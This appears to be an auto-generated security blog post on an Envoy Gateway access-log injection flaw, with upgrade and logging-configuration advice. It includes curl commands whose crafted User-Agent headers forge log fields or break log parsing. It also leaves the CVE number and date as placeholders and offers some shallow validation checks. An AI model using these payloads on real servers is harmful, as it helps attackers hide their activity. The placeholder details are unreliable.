Envoy Gateway, Log Injection Vulnerability, CVE-2023-XXXX (Critical)

By /

Listen to this Post

How the Mentioned CVE Works:

The vulnerability in Envoy Gateway versions prior to 1.2.7 and 1.3.1 lies in the default access log configuration, which is susceptible to log injection attacks. Attackers can exploit this by crafting a malicious user-agent string that injects JSON into the access logs. For example, a user-agent string like `HELLO-WORLD”, “evil-ip”: “1.1.1.1”, “x-forwarded-for”: “1.1.1.1` can overwrite or add new fields in the access logs. This manipulation can hide malicious activities by altering critical fields like X-Forwarded-For, which are essential for security analysis. Additionally, attackers can render the logs invalid by injecting malformed JSON, causing observability tools to fail in processing the logs, further obscuring their activities.

DailyCVE Form:

Platform: Envoy Gateway
Version: <1.2.7, <1.3.1
Vulnerability: Log Injection
Severity: Critical
Date: 2023-XX-XX

(End of form)

What Undercode Say:

Exploitation:

1. Craft Malicious User-Agent:

Use a payload like `HELLO-WORLD”, “evil-ip”: “1.1.1.1”, “x-forwarded-for”: “1.1.1.1` to inject JSON.

Example:

curl -H "User-Agent: HELLO-WORLD\", \"evil-ip\": \"1.1.1.1\", \"x-forwarded-for\": \"1.1.1.1" http://target

2. Invalid JSON Injection:

Use a payload like `”` to break JSON parsing.

Example:

curl -H "User-Agent: \"" http://target

Protection:

1. Update Envoy Gateway:

Upgrade to versions 1.2.7 or 1.3.1.

helm upgrade envoy-gateway --version 1.3.1

2. Apply JSON Log Format:

Configure `EnvoyProxy.spec.telemetry.accessLog` to use JSON format.

Example YAML:

telemetry:
accessLog:
settings:
- format:
type: JSON
json:
start_time: '%START_TIME%'
method: '%REQ(:METHOD)%'
x-forwarded-for: '%REQ(X-FORWARDED-FOR)%'
user-agent: '%REQ(USER-AGENT)%'

3. Validate Logs:

Use observability tools to validate log integrity.

Example:

grep -v "invalid" envoy-access.log

Analytics:

  • Log Monitoring:
    Use tools like Elasticsearch or Splunk to detect anomalies in access logs.

Example query:

{
"query": {
"match": {
"user-agent": "\""
}
}
}

– Alerting:

Set up alerts for malformed JSON in logs.

Example:

alert if log_format != "JSON"

References:

Commands:

  • Check Envoy Version: 
    envoy --version
  • Apply Workaround: 
    kubectl apply -f envoy-config.yaml
  • Test Log Injection: 
    curl -H "User-Agent: TEST\", \"test-ip\": \"1.1.1.1\"" http://localhost

References:

Reported By: https://github.com/advisories/GHSA-mf24-chxh-hmvj
Extra Source Hub:
Undercode

Image Source:

Undercode AI DI v2

Join Our Cyber World:

Whatsapp
TelegramFeatured Image

Scroll to Top